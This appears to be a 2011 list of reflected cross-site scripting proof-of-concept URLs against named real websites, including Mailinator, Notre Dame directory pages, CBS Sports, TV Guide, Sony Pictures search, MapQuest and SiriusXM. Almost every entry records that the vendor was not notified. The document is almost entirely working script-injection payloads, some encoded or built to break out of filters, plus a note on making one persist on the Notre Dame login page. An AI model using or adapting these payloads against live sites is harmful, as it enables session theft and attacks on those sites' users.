Mailinator.com
Date: Dec-29-2011
Vendor Notified: No
Proof of Concept:
http://www.mailinator.com/maildir.jsp?email=--></script><script>alert('0');</script>
Date: Sept-25-2011
Vendor Notified: No
Proof of Concept:
https://apps.nd.edu/webdirectory/directory.cfm?cn=<script>alert('0');</script>
Date: Sept-25-2011
Vendor Notified: No
Proof of Concept:
https://webfile.nd.edu/~</script><script>alert('0');</script>/apps/webfile
Note:
After hitting the URL, go back to the webfile login (https://webfile.nd.edu) and use any dummy login credentials. The previous XSS payload will still be present and will trigger an internal server error.
Date: Aug-20-2011
Vendor Notified: No
Proof of Concept:
http://www.cbssports.com/info/search#q=//";//\";//--></script>">'><script>alert(0)</script>
Date: Aug-20-2011
Vendor Notified: No
Proof of Concept:
http://www.addictinggames.com/static/php/game/searchPage.php?pageAction=search&text=%3C/script%3E%3Cscript%3Ealert%280%29;%3C/script%3E
Date: Aug-18-2011
Vendor Notified: No
Proof of Concept:
http://www.tvguide.com/search/index.aspx?keyword=%22%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E
Date: Aug-18-2011
Vendor Notified: No
Proof of Concept:
http://search.sonypictures.com/search?q=%22;alert%280%29//&proxystylesheet=sp-us&site=sp-us
Date: Jul-26-2011
Vendor Notified: Yes
Proof of Concept:
http://web.sa.mapquest.com/wendys/advantage.adp?template=en_search_error&postalCode=\%27;alert(0)//
Date: Jul-24-2011
Vendor Notified: No
Proof of Concept:
http://www.siriusxm.com/servlet/Satellite?c=SXM_Channel_C&childpagename=SXM%2FSXM_Channel_C%2FChannelDetail&cid=--%3E%3Cscript%3Ealert(%270%27);%3C/script%3E&pagename=SXM%2FWrapper
Date: May-07-2011
Vendor Notified: No
Proof of Concept:
http://www.hltv.org/?pageid=198&search=1&teams=%3C/script%3E%22%3E%27%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E